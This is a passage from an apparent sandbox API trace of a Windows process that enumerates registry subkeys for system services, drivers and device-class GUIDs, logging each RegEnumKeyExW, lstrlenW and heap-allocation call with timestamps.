lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.537] lstrlenW (lpString="rdpencdd.sys") returned 12 [0175.537] GetProcessHeap () returned 0x4a0000 [0175.537] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x1a) returned 0x4b4090 [0175.537] GetProcessHeap () returned 0x4a0000 [0175.537] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b6848 [0175.537] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x39, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="rdsessmgr", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.538] lstrlenW (lpString="rdsessmgr") returned 9 [0175.538] GetProcessHeap () returned 0x4a0000 [0175.538] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b6868 [0175.538] GetProcessHeap () returned 0x4a0000 [0175.538] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b6888 [0175.538] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x3a, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="RpcEptMapper", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.538] lstrlenW (lpString="RpcEptMapper") returned 12 [0175.538] GetProcessHeap () returned 0x4a0000 [0175.538] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x1a) returned 0x4b40b8 [0175.538] GetProcessHeap () returned 0x4a0000 [0175.538] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b68a8 [0175.538] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x3b, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="RpcSs", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.539] lstrlenW (lpString="RpcSs") returned 5 [0175.539] GetProcessHeap () returned 0x4a0000 [0175.539] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0xc) returned 0x4b6068 [0175.539] GetProcessHeap () returned 0x4a0000 [0175.539] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b68c8 [0175.539] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x3c, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="sacsvr", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.539] lstrlenW (lpString="sacsvr") returned 6 [0175.539] GetProcessHeap () returned 0x4a0000 [0175.539] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0xe) returned 0x4b6080 [0175.539] GetProcessHeap () returned 0x4a0000 [0175.539] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b68e8 [0175.539] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x3d, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="SCardSvr", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.540] lstrlenW (lpString="SCardSvr") returned 8 [0175.540] GetProcessHeap () returned 0x4a0000 [0175.540] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x12) returned 0x4b6908 [0175.540] GetProcessHeap () returned 0x4a0000 [0175.540] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b6928 [0175.540] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x3e, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="SCSI Class", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.540] lstrlenW (lpString="SCSI Class") returned 10 [0175.540] GetProcessHeap () returned 0x4a0000 [0175.540] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x16) returned 0x4b6948 [0175.540] GetProcessHeap () returned 0x4a0000 [0175.540] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b6968 [0175.540] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x3f, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="sermouse.sys", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.540] lstrlenW (lpString="sermouse.sys") returned 12 [0175.541] GetProcessHeap () returned 0x4a0000 [0175.541] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x1a) returned 0x4b40e0 [0175.541] GetProcessHeap () returned 0x4a0000 [0175.541] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b6988 [0175.541] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x40, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="SharedAccess", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.541] lstrlenW (lpString="SharedAccess") returned 12 [0175.541] GetProcessHeap () returned 0x4a0000 [0175.541] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x1a) returned 0x4b4108 [0175.541] GetProcessHeap () returned 0x4a0000 [0175.541] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b69a8 [0175.541] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x41, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Streams Drivers", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.541] lstrlenW (lpString="Streams Drivers") returned 15 [0175.541] GetProcessHeap () returned 0x4a0000 [0175.541] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x20) returned 0x4b4130 [0175.541] GetProcessHeap () returned 0x4a0000 [0175.542] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b69c8 [0175.542] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x42, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="SWPRV", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.542] lstrlenW (lpString="SWPRV") returned 5 [0175.542] GetProcessHeap () returned 0x4a0000 [0175.542] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0xc) returned 0x4b6098 [0175.542] GetProcessHeap () returned 0x4a0000 [0175.542] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b69e8 [0175.542] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x43, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System Bus Extender", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.542] lstrlenW (lpString="System Bus Extender") returned 19 [0175.542] GetProcessHeap () returned 0x4a0000 [0175.542] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x28) returned 0x4b6f98 [0175.542] GetProcessHeap () returned 0x4a0000 [0175.542] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b6a08 [0175.543] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x44, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="TabletInputService", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.543] lstrlenW (lpString="TabletInputService") returned 18 [0175.543] GetProcessHeap () returned 0x4a0000 [0175.543] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x26) returned 0x4b6fc8 [0175.543] GetProcessHeap () returned 0x4a0000 [0175.543] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b6a28 [0175.543] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x45, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="TBS", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.543] lstrlenW (lpString="TBS") returned 3 [0175.543] GetProcessHeap () returned 0x4a0000 [0175.543] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x8) returned 0x4b6ff8 [0175.543] GetProcessHeap () returned 0x4a0000 [0175.543] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b6a48 [0175.543] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x46, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Tcpip", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.544] lstrlenW (lpString="Tcpip") returned 5 [0175.544] GetProcessHeap () returned 0x4a0000 [0175.544] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0xc) returned 0x4b60b0 [0175.544] GetProcessHeap () returned 0x4a0000 [0175.544] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b6a68 [0175.544] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x47, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="TDI", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.544] lstrlenW (lpString="TDI") returned 3 [0175.544] GetProcessHeap () returned 0x4a0000 [0175.544] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x8) returned 0x4b7008 [0175.544] GetProcessHeap () returned 0x4a0000 [0175.544] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b6a88 [0175.544] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x48, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="TrustedInstaller", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.544] lstrlenW (lpString="TrustedInstaller") returned 16 [0175.545] GetProcessHeap () returned 0x4a0000 [0175.545] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x22) returned 0x4b7018 [0175.545] GetProcessHeap () returned 0x4a0000 [0175.545] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b6aa8 [0175.545] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x49, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="VaultSvc", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.545] lstrlenW (lpString="VaultSvc") returned 8 [0175.545] GetProcessHeap () returned 0x4a0000 [0175.545] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x12) returned 0x4b6ac8 [0175.545] GetProcessHeap () returned 0x4a0000 [0175.545] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b6ae8 [0175.545] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x4a, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="VDS", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.545] lstrlenW (lpString="VDS") returned 3 [0175.545] GetProcessHeap () returned 0x4a0000 [0175.546] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x8) returned 0x4b7048 [0175.546] GetProcessHeap () returned 0x4a0000 [0175.546] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b6b08 [0175.546] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x4b, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="vga.sys", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.546] lstrlenW (lpString="vga.sys") returned 7 [0175.546] GetProcessHeap () returned 0x4a0000 [0175.546] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x10) returned 0x4b60c8 [0175.546] GetProcessHeap () returned 0x4a0000 [0175.546] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b6b28 [0175.546] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x4c, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="vgasave.sys", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.546] lstrlenW (lpString="vgasave.sys") returned 11 [0175.546] GetProcessHeap () returned 0x4a0000 [0175.546] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x18) returned 0x4b6b48 [0175.546] GetProcessHeap () returned 0x4a0000 [0175.547] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b6b68 [0175.547] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x4d, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="vmms", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.707] lstrlenW (lpString="vmms") returned 4 [0175.707] GetProcessHeap () returned 0x4a0000 [0175.707] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0xa) returned 0x4b60e0 [0175.707] GetProcessHeap () returned 0x4a0000 [0175.707] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b6b88 [0175.708] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x4e, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="volmgr.sys", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.708] lstrlenW (lpString="volmgr.sys") returned 10 [0175.708] GetProcessHeap () returned 0x4a0000 [0175.708] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x16) returned 0x4b6ba8 [0175.708] GetProcessHeap () returned 0x4a0000 [0175.708] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b6bc8 [0175.708] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x4f, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="volmgrx.sys", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.708] lstrlenW (lpString="volmgrx.sys") returned 11 [0175.708] GetProcessHeap () returned 0x4a0000 [0175.708] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x18) returned 0x4b6be8 [0175.708] GetProcessHeap () returned 0x4a0000 [0175.708] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b6c08 [0175.708] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x50, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WinMgmt", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.709] lstrlenW (lpString="WinMgmt") returned 7 [0175.709] GetProcessHeap () returned 0x4a0000 [0175.709] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x10) returned 0x4b60f8 [0175.709] GetProcessHeap () returned 0x4a0000 [0175.709] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b6c28 [0175.709] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x51, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Wlansvc", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.709] lstrlenW (lpString="Wlansvc") returned 7 [0175.709] GetProcessHeap () returned 0x4a0000 [0175.709] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x10) returned 0x4b6110 [0175.709] GetProcessHeap () returned 0x4a0000 [0175.709] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b6c48 [0175.710] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x52, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WudfPf", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.710] lstrlenW (lpString="WudfPf") returned 6 [0175.710] GetProcessHeap () returned 0x4a0000 [0175.710] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0xe) returned 0x4b6128 [0175.710] GetProcessHeap () returned 0x4a0000 [0175.710] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b6c68 [0175.710] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x53, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WudfRd", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.710] lstrlenW (lpString="WudfRd") returned 6 [0175.710] GetProcessHeap () returned 0x4a0000 [0175.710] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0xe) returned 0x4b6140 [0175.710] GetProcessHeap () returned 0x4a0000 [0175.710] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b6c88 [0175.710] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x54, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WudfSvc", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.711] lstrlenW (lpString="WudfSvc") returned 7 [0175.711] GetProcessHeap () returned 0x4a0000 [0175.711] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x10) returned 0x4b6158 [0175.711] GetProcessHeap () returned 0x4a0000 [0175.711] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b6ca8 [0175.711] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x55, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WudfUsbccidDriver", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.711] lstrlenW (lpString="WudfUsbccidDriver") returned 17 [0175.711] GetProcessHeap () returned 0x4a0000 [0175.711] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x24) returned 0x4b7058 [0175.711] GetProcessHeap () returned 0x4a0000 [0175.711] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b6cc8 [0175.712] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x56, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{36FC9E60-C465-11CF-8056-444553540000}", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.712] lstrlenW (lpString="{36FC9E60-C465-11CF-8056-444553540000}") returned 38 [0175.712] GetProcessHeap () returned 0x4a0000 [0175.712] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x4e) returned 0x4b70b8 [0175.712] GetProcessHeap () returned 0x4a0000 [0175.712] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b6ce8 [0175.712] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x57, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{4D36E965-E325-11CE-BFC1-08002BE10318}", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.712] lstrlenW (lpString="{4D36E965-E325-11CE-BFC1-08002BE10318}") returned 38 [0175.712] GetProcessHeap () returned 0x4a0000 [0175.712] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x4e) returned 0x4b7110 [0175.712] GetProcessHeap () returned 0x4a0000 [0175.712] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b6d08 [0175.712] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x58, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{4D36E967-E325-11CE-BFC1-08002BE10318}", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.713] lstrlenW (lpString="{4D36E967-E325-11CE-BFC1-08002BE10318}") returned 38 [0175.713] GetProcessHeap () returned 0x4a0000 [0175.713] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x4e) returned 0x4b7168 [0175.713] GetProcessHeap () returned 0x4a0000 [0175.713] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b6d28 [0175.713] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x59, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{4D36E969-E325-11CE-BFC1-08002BE10318}", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.713] lstrlenW (lpString="{4D36E969-E325-11CE-BFC1-08002BE10318}") returned 38 [0175.713] GetProcessHeap () returned 0x4a0000 [0175.713] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x4e) returned 0x4b71c0 [0175.713] GetProcessHeap () returned 0x4a0000 [0175.713] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b6d48 [0175.713] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x5a, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{4D36E96A-E325-11CE-BFC1-08002BE10318}", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.714] lstrlenW (lpString="{4D36E96A-E325-11CE-BFC1-08002BE10318}") returned 38 [0175.714] GetProcessHeap () returned 0x4a0000 [0175.714] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x4e) returned 0x4b7218 [0175.714] GetProcessHeap () returned 0x4a0000 [0175.714] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b6d68 [0175.714] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x5b, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{4D36E96B-E325-11CE-BFC1-08002BE10318}", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.714] lstrlenW (lpString="{4D36E96B-E325-11CE-BFC1-08002BE10318}") returned 38 [0175.714] GetProcessHeap () returned 0x4a0000 [0175.714] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x4e) returned 0x4b7270 [0175.714] GetProcessHeap () returned 0x4a0000 [0175.714] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b6d88 [0175.714] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x5c, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{4D36E96F-E325-11CE-BFC1-08002BE10318}", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.715] lstrlenW (lpString="{4D36E96F-E325-11CE-BFC1-08002BE10318}") returned 38 [0175.715] GetProcessHeap () returned 0x4a0000 [0175.715] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x4e) returned 0x4b72c8 [0175.715] GetProcessHeap () returned 0x4a0000 [0175.715] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b6da8 [0175.715] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x5d, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{4D36E972-E325-11CE-BFC1-08002BE10318}", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.715] lstrlenW (lpString="{4D36E972-E325-11CE-BFC1-08002BE10318}") returned 38 [0175.715] GetProcessHeap () returned 0x4a0000 [0175.715] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x4e) returned 0x4b7320 [0175.715] GetProcessHeap () returned 0x4a0000 [0175.715] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b6dc8 [0175.715] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x5e, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{4D36E973-E325-11CE-BFC1-08002BE10318}", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.716] lstrlenW (lpString="{4D36E973-E325-11CE-BFC1-08002BE10318}") returned 38 [0175.716] GetProcessHeap () returned 0x4a0000 [0175.716] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x4e) returned 0x4b7378 [0175.716] GetProcessHeap () returned 0x4a0000 [0175.716] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b6de8 [0175.716] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x5f, lpName=0x4b6e90, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{4D36E974-E325-11CE-BFC1-08002BE10318}", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.716] lstrlenW (lpString="{4D36E974-E325-11CE-BFC1-08002BE10318}") returned 38 [0175.716] GetProcessHeap () returned 0x4a0000 [0175.716] RtlAllocateHeap 